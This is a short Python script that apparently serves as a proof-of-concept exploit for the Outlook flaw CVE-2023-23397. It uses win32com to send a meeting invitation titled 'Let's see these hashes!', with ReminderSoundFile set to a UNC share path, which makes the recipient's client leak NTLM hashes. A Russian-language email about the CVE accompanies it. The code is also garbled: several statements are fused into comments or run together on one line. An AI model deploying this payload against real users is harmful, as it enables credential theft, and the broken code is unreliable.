import win32com.client
outlook = win32com.client.Dispatch("Outlook.Application") # def sendEmail():
Msg = outlook.CreateItem(0) # Email
Msg.To = "[email protected]" # you can add multiple emails with the ; as delimiter. E.g. [email protected]; [email protected];
Msg.CC = "[email protected]"
Msg.Subject = "Срочно, Уязвимость!"
Msg.Body = "Срочно устраняй CVE-2023-23397"
def sendMeeting():
appt = outlook.CreateItem(1) # AppointmentItem
appt.Start = "2023-03-16 20:23" # yyyy-MM-dd hh:mm
appt.Subject = "Let's see these hashes!"
appt.AllDayEvent = True # In minutes (60 Minutes)
appt.Location = "Location Name"
appt.MeetingStatus = 1 # 1 - olMeeting; Changing the appointment to meeting. Only after changing the meeting status recipients can be added appt.Recipients.Add("[email protected]") # Don't end ; as delimiter
appt.ReminderSoundFile = "\\\\\\\\\\\\file"
appt.ReminderOverrideDefault = True
appt.ReminderPlaySound = True
appt.Save() appt.Send()